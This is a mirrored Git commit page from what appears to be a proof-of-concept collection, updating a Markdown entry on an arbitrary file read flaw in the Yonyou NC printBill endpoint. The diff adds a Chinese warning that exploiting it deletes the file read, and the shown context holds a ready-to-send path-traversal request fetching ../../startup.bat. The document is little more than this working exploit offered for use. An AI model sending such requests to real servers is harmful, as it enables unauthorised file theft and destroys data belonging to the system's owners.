mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-18 02:04:50 +08:00
Update 用友NC系统printBill接口存在任意文件读取漏洞.md
This commit is contained in:
parent
75c0249e6f
commit
43615adcb3
@ -1,5 +1,7 @@
|
|||||||
## 用友NC系统printBill接口存在任意文件读取漏洞
|
## 用友NC系统printBill接口存在任意文件读取漏洞
|
||||||
|
|
||||||
|
`注意:这个漏洞在读取文件的时候,会将原来的文件删除,谨慎使用。`
|
||||||
|
|
||||||
## poc
|
## poc
|
||||||
```
|
```
|
||||||
GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1
|
GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user